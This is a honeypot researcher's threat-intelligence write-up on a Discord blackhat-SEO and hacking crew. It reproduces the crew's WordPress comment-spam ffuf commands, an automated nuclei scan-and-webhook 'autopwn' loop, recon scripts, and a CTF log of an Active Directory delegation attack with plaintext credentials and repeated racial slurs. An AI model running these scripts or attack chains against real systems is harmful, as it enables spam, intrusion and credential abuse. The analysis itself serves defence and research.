Ukrainian Honeypot ::009:: Crew ::001:: chakal1337 // “Skidson Mafia” // Hacking/Blackhat SEO Discord Servers

Ukrainian Honeypot ::009:: Crew ::001:: chakal1337 // “Skidson Mafia” // Hacking/Blackhat SEO Discord Servers

Last Updated

Mon Oct 9 18:54:14 2023

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)

https://bcable.net/analysis-ukr-prelim.html

https://bcable.net/analysis-ukr-graphs.html

https://bcable.net/analysis-ukr-indicators.html

https://bcable.net/analysis-ukr-ru_map_sessions.html

https://bcable.net/analysis-ukr-cn_map_sessions.html

https://bcable.net/analysis-ukr-miori_fail.html

https://bcable.net/analysis-ukr-botnet_perl.html

https://bcable.net/analysis-ukr-ddos_gh0st.html

https://bcable.net/analysis-ukr-indicators_2023.html

https://bcable.net/analysis-ukr-crew_001.html

https://bcable.net/analysis-ukr-inventory_attack.html

https://bcable.net/analysis-ukr-crew_002.html

Log

stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&email=##redacted-site##%40gmail.com&url=https://##redacted-site##/&submit=Post+Comment&comment_post_ID=1&comment_parent=0&wp-comment-cookies-consent=true'),

Discord

I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt who goes there” access restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced peoplei totalling about 20 people. I ignored most of it, wasn’t really relevant since it was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:

“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”

wget -c s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt (edited)

“[11/16/2022 5:27 AM] Screen quick cheatsheet:”

screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)

“Making backlinks with ffuf”

ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: http://yoursite.com/" -d "comment=hello+world&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.com%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0" -H "User-Agent: Mozilla/5.0 (Firefox)"

Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself, they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate out of mostly Bangladesh but this group mostly spoke Portuguese it seemed.

I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.

Another Project

Here is another project which seems to send a generic JSON webhook to mass targets. Takes things off HackerOne datasets and uses nuclei to attempt to exploit, so things should be acceptable targets.

/usr/bin/getallscope

#!/usr/bin/python3
import json
import requests
import random

url = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json"
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
 if not "targets" in data: continue
 for target in data["targets"]["in_scope"]:
  if not target["asset_identifier"].startswith("*."): continue
  if not target["eligible_for_bounty"] == True: continue
  if not target["eligible_for_submission"] == True: continue
  fullz.append(target["asset_identifier"].replace("*.", ""))
random.shuffle(fullz)
print("\n".join(fullz))

/usr/bin/getrandscope

#!/bin/bash
getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile

/usr/bin/autopwn

#!/bin/bash
rm probed;
rm foundvuln.txt;
rm tmpfile;
getrandscope;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;

/usr/bin/sendwebhook (change webhook url to yours)

#!/bin/bash
argstr=$@;
argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;

/usr/bin/pwnforever

#!/bin/bash
while true; do 
 autopwn;
done

“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”

nohup pwnforever &

“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”

uniqparam.py

“takes urls from stdin and prints only the ones with unique parameter names”

#!/usr/bin/python3
import sys

urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
 else:
  urlparams = ""
 paramsfull += getpath(url)
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}".format(urlparam)
 if not paramsfull in urlparamlist:
  urlparamlist.append(paramsfull)
  return 0
 else:
  return 1

for url in sys.stdin:
 url = url.strip()
 if not alreadyparam(url):
  print(url)

“example:”

cat all_urls.txt | python uniqparam.py > unique_param.txt

grabipranges (JS)

function grabipranges() {
 full = "";
 var links = document.getElementsByTagName("a");
 for(let i = 0; i < links.length; i++) {
  if(!links[i].href) continue;
  if(links[i].href.indexOf("/prefix/") == -1) continue;
  if(links[i].href.indexOf("::") !== -1) continue;
  full += links[i].href.split("prefix/")[1] + " ";
 }
 console.log(full);
}
grabipranges();

“little script to grab all ip ranges from bgp.tools”

Auto-Scan Script

#!/bin/bash
if [[ $# < 1 ]]; then
 echo "$0 <domain>";
 exit;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null;  then
 sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null;  then
 sudo apt install getallurls;
fi
if ! which nmap &>/dev/null;  then
 sudo apt install nmap;
fi
if ! which httprobe &>/dev/null;  then
 sudo apt install nmap;
fi
if ! which dirsearch &>/dev/null; then
 sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";

switchparam.py

#!/usr/bin/python3
import sys

urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def getbase(url):
 schema = url.split("://")[0]
 url = url.split("://")[1]
 if "/" in url: url = url.split("/")[0]
 fullurl = "{}://{}/".format(schema, url)
 return fullurl

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
 else:
  urlparams = ""
 paramsfull += getpath(url)+"?"
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}={}&".format(urlparam, sys.argv[1])
 paramsfull = "&".join(paramsfull.split("&")[:-1])
 if not paramsfull in urlparamlist:
  urlparamlist.append(paramsfull)
  print(getbase(url)+paramsfull)
  return 0
 else:
  return 1

for url in sys.stdin:
 url = url.strip()
 alreadyparam(url)

wordg.py

“generate custom wordlist from cewl output”

cat cewld.txt | python3 wordg.py > generated.txt
import sys

words = []

for line in sys.stdin:
 words.append(line.strip())

def mk(lower=False):
 for word in words:
  for word2 in words:
   if word == word2: continue
   if lower == True:
    word = word.lower()
    word2 = word2.lower()
   print("{}{}".format(word, word2))
   print("{}-{}".format(word, word2))
   print("{}.{}".format(word, word2))
   print("{}_{}".format(word, word2))


words = list(set(words))
print(mk())
print(mk(lower=True))

Other Logs Provided

These I believe are logs of their CTF challenge successes.

Nmap scan report for 10.10.11.174
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46499/tcp): CLEAN (Timeout)
|   Check 2 (port 19493/tcp): CLEAN (Timeout)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 55678/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-10-31T19:18:57
|_  start_date: N/A


PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     guest@support.htb
|_    administrator@support.htb


SMB         dc.support.htb  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         dc.support.htb  445    DC               [+] support.htb\guest:
SMB         dc.support.htb  445    DC               [+] Enumerated shares
SMB         dc.support.htb  445    DC               Share           Permissions     Remark
SMB         dc.support.htb  445    DC               -----           -----------     ------
SMB         dc.support.htb  445    DC               ADMIN$                          Remote Admin
SMB         dc.support.htb  445    DC               C$                              Default share
SMB         dc.support.htb  445    DC               IPC$            READ            Remote IPC
SMB         dc.support.htb  445    DC               NETLOGON                        Logon server share
SMB         dc.support.htb  445    DC               support-tools   READ            support staff tools
SMB         dc.support.htb  445    DC               SYSVOL                          Logon server share


CREDS:
ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz


[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1


[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1

support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria

CREDS
support
Ironside47pleasure40Watchful

LOGIN PS
evil-winrm -i dc.support.htb -u support

REMOTE

New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"

.\Rubeus.exe  hash /password:123456 /user:NIGGER$ /domain:support.htb

LOCAL

impacket-getST support.htb/NIGGER$ -spn http/dc.support.htb -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip dc.support.htb

export KRB5CCNAME=administrator.ccache

impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass

ROOTT FUCCKING FINNAALLYY NIGGGGERRRR

Other Tricks

kali i3

how to get

[img of i3 for kali]

- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot

Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm.

Discord Unicode Usernames

Apparently using the control code \x0a as a username will be accepted by Discord (UPDATE: not true anymore), but make a blank username. This was used by a non-core member of said crew.

https://book.hacktricks.xyz/welcome/readme

https://cheatsheetseries.owasp.org/

https://github.com/danielmiessler/SecLists

https://github.com/vavkamil/awesome-bugbounty-tools

Tools List Provided

Web App Tools

dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools its a must have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories

Online Tools

https://cyberchef.org/ - mess with various data formats and encodings (great tool)
https://check-host.net/ - check availability of hosts, tcp and udp ports, ping, geolocation and more
https://bgp.tools/ - bgp tools
https://bgp.he.net/ - even more bgp tools
https://dehashed.com/ - service to find passwords from breaches
https://www.whoxy.com/ - whois history, reverse whois and other whois tools

Windows Tools

crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration

Network Tools

masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http

Linux Tools:

linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding

C2 Tools

powershell-empire - c2/post exploitation framweork with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux

Exfiltration Tools

rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb

OSINT Tools

Google - the most powerful of them all..
doxtool.py - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files

Password Tools

hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
Wyd.pl - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line

SEO/Spam Tools

Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in miliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent

Reverse Engineering

x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering

Binary Exploitation

pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates

Message Monitoring

Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style “1337-speak” is no longer a thing, and broken english is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface), many common influencers were common tactics. This provided for very expressive “reactive” people that were easily memeable and easy to communicate via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.

Eventually a link was posted to https://skidson.online/admin.php which provided a ton of other DNS entries.

Description provided of features:

- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim

Samples of Chat:

These are some of the more sanitized chat/meme examples:







Arrow/goober meme is a common meme from discord.gg/cats. Coordinates are of Raven Rock Mountain Complex in Pennsylvania:

https://en.wikipedia.org/wiki/Raven_Rock_Mountain_Complex










Redacted the final location as I’ll be doing a more in-depth analysis much later of Matrix with over 1GB of raw text to analyze and graph of extremist groups, largely not from this crew.

Not much was gleaned there anyway, as it was eventually removed. They had a code name for their hidey hole:

But I did manage to coerce a link to it from someone:

My assessment was that I wouldn’t be able to join a server with six members without being figured out, and it would have jeopardized the other extremism research I am still doing.

Domain Monitoring

skidson.online

skidson.online.		300	IN	A	172.67.181.198
skidson.online.		300	IN	A	104.21.35.252
Domain Name: SKIDSON.ONLINE
Registry Domain ID: D164729351-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2022-01-20T16:10:46.0Z
Creation Date: 2020-01-20T21:13:35.0Z
Registry Expiry Date: 2024-01-20T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Skidson
Registrant State/Province: Lisbon
Registrant Country: PT

blackhatseo.win

blackhatseo.win.	297	IN	A	104.21.86.207
blackhatseo.win.	297	IN	A	172.67.136.208
Registry Domain ID: DC554398F83D34DCE86218FFB922AE69B-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T23:59:30Z
Creation Date: 2022-01-22T02:33:23Z
Registry Expiry Date: 2023-01-22T02:33:23Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT

splog.win

splog.win.		300	IN	A	104.21.88.21
splog.win.		300	IN	A	172.67.171.249
Domain Name: splog.win
Registry Domain ID: DF4AAD8EE7359417AAE90173EF832CFE0-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T22:57:15Z
Creation Date: 2022-02-15T05:00:50Z
Registry Expiry Date: 2023-02-15T05:00:50Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT

feetporn.win

feetporn.win.		300	IN	A	104.21.3.50
feetporn.win.		300	IN	A	172.67.130.64
Domain Name: feetporn.win
Registry Domain ID: DCF7AC62B00DD49518ACA532DE234EC80-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-21T00:45:15Z
Creation Date: 2022-01-19T00:56:56Z
Registry Expiry Date: 2023-01-19T00:56:56Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT

aqw.icu

aqw.icu.		300	IN	A	172.67.129.37
aqw.icu.		300	IN	A	104.21.2.119
Domain Name: AQW.ICU
Registry Domain ID: D316305496-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US

aqw.monster

aqw.monster.		300	IN	A	172.67.196.176
aqw.monster.		300	IN	A	104.21.52.73
[Querying whois.internic.net]
[whois.internic.net]
No match for domain "AQW.MONSTER".

aqworlds.live

aqworlds.live.		300	IN	A	172.67.140.121
aqworlds.live.		300	IN	A	104.21.70.236
[Querying whois.rightside.co]
[whois.rightside.co]

aqworlds.top

aqworlds.top.		300	IN	A	104.21.37.222
aqworlds.top.		300	IN	A	172.67.213.234
Domain Name: aqworlds.top
Registry Domain ID: D20220807G10001G_85842468-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:20:30Z
Creation Date: 2022-08-06T16:14:56Z
Registry Expiry Date: 2023-08-06T16:14:56Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

aqworlds.xyz

aqworlds.xyz.		300	IN	A	172.67.142.194
aqworlds.xyz.		300	IN	A	104.21.95.37
Domain Name: AQWORLDS.XYZ
Registry Domain ID: D316305490-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US

chat-online.top

chat-online.top.	300	IN	A	172.67.183.203
chat-online.top.	300	IN	A	104.21.48.101
Domain Name: chat-online.top
Registry Domain ID: D20220723G10001G_85022334-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-07-22T16:17:08Z
